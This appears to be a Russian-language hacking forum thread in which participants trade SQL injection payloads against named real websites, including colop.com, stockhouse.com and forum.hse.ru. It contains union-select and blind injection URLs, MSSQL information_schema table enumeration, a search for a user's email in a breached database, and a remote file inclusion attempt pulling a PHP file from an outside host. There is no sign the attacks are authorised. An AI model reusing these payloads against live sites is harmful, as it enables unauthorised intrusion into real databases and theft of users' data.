http://previous.colop.com/sl/products/colop--printer_dater/product.php?id=-colop:11322000'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+ Здесь есть SQL-inj?
слепая есть => http://previous.colop.com/sl/products/colop--printer_oval/product.php?id=colop:13026000'+and+(select substring(version(),1,1))=4/* если пытаться вывести и первый запрос возращ. фелсе, то ошибка в XML. мб Xpath и SQLinj хз
спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего? http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)-- выводит таблицу с текушего бд Shdb
если бы where помогло не писал бы тут(( вот http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables+where+table_schema='SH_users')-- ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /adredirect.asp, line 25
HTML: group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema' HTML: group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе' Либо HTML: group_concat(table_name)+from+infor mation_schema.tables+limit+0,1 и поочередно меняешь limit 0,1 limit 1,1 limit 2,1 и тд.
хмм. вроде ругается Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name. /adredirect.asp, line 23 я уже знаю имена всех бд, но нужные бд не текуший
упс , вернее так: http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514492E34962820230F0E51BEE26%27%29%29-- далее http://www.stockhouse.com/adredirect.asp?sid=%28select/**/top+1+table_name+from+information_schema.tables%20where+table_name+not+in+%28%27MSmerge_tsvw_8BA2514492E34962820230F0E51BEE26%27,%27MSmerge_log_files%27%29%29-- и т.д В mssql есть база данных в которой хранится информация о всех таблицах и колонках во всех бд данного сервера статьи читать надо.
тут какая то неполадка. Я регал мейл kvadimex но не могу найти в базе этот мейл((. Подскажите как делать запрос тут. like '%email%' прошло в поиске таблицы с мейлом но like '%kvadimex%' не работает
Можно что-то придумать для такого запроса? $table никак не фильтруется. Code: $sql = "REPAIR TABLE {$table}";
не могу никак заинклудить (мож его тут и нет...хз) пробовал и с нулевым байтом и с ? и с расширением и без него...хз в чем дело http://forum.hse.ru/gold/index.php?t=usrinfo&id=http://site.ru/99.php%00 если тут нет инклуда, то мб что то другое?
Code: http://forum.hse.ru/gold/index.php?t=usrinfo&id=1 и? Еще не надоело писать то, что и без вашего участия уже с такой же ошибкой (читай - кривые руки админа)? PS: Для начала найдите сайт, которые сразу, без вас, не вываливает мильон ошибок по какой-то ссылке
Konqi,Pashkela то что и без меня есть ошибки я заметил=) мне интересно могу ли я влиять на бд каким либо образом?